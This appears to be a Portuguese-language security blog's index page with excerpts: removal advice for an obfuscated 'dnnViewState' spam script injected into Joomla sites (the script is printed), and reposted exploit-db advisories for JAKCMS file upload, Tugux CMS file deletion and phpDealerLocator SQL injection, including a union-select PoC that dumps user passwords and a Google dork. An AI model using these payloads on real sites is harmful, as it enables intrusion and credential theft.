dnnViewState SPAM Joomla Como resolver (HOW TO SOLVE THIS)

03/08/2013 5 Comments

É comum ver o CMS joomla em suas versões mais antigas sendo trollado por uma chuva de webbots, um dos defaces mais imundos que rodam na atualidade são justamente esses 2 (AVAST Chama-o de CLICKJACK-A — TROJAN):   <script type=”text/javascript” language=”JavaScript”>// <![CDATA[ function xViewState() { var a=0,m,v,t,z,x=new Array(‘9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’877886888787′,’949990793917947998942577939317’),l=x.length;while(++a<=l){m=x[l-a]; t=z=”; for(v=0;v<m.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t=”;}}x[l-a]=z;}document.write(‘<‘+x[0]+’ ‘+x[4]+’>.’+x[2]+'{‘+x[1]+’}</’+x[0]+’>’);}xViewState(); // ]]></script> …

JAKCMS PRO

23/09/2011 0 Comments

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Fonte: http://www.exploit-db.com/exploits/17882/

Como verificar versões de CMS de maneira rápida e prática

12/07/2011 0 Comments

Para verificar devemos baixar a seguinte ferramenta em um dos dois endereços abaixo: root@appunix:˜#wget http://server.cmsversion.com/checktest.sh ou root@appunix:˜#wget http://www.libphp.net/checktest.sh Em seguida fazer o seguinte root@appunix:˜#chmod +x checktest.sh root@appunix:˜#./checktest.sh -u logindeumacontanomeuserver A saída deverá assemelhar-se com: Latest Joomla: 1.5.23 Installed Version: 1.5.20 Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/ Essa dica funciona para Joomla, WordPress, WHMCS e etc.

Tugux CMS 1.2 (pid) Arbitrary File Deletion Vulnerability

11/07/2011 0 Comments

Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability Vendor: Tugux Studios Product web page: http://www.tugux.com Affected version: 1.2 Summary: Tugux CMS is a free, open-source content Management system (CMS) and application that powers the entire web. Desc: Input passed to the ‘pid’ parameter in administrator/delete_page_parse.php is not properly sanitised before being used to delete …

phpDealerLocator Multiple SQL Injection Vulnerabilities

04/07/2011 0 Comments

# Exploit Title: phpDealerLocator – Multiple SQL Injection vulnerabilities # Date: 7/3/2011 # Author: Robert Cooper (admin[at]websiteauditing.org) # Software Link: phpdealerlocator.yourphppro.com # Tested on: [Linux/Windows 7] #Vulnerable Parameters: record.php?Dealer_ID= record_country.php?Dealer_ID= results_latlong.php?s_Latitude= results_latlong.php?s_Longitude= results_latlong.php?s_Dealer_Radius= results_phone.php?s_Dealer_Radius= results_radius.php?s_Dealer_Radius= ############################################################## PoC: http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users– ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew Fonte: http://www.exploit-db.com/exploits/17477/

PhpFood CMS v2.00 SQL Injection Vulnerability

04/07/2011 0 Comments

############################################################################################################# ## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ## ## Author : kaMtiEz (kamtiez@exploit-id.com) ## ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ## ## Date : 3 July, 2011 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.phpfood.com/ [+] Download : http://www.phpfood.com/download.html [+] version : 2.00 or lower maybe also affected [+] Vulnerability …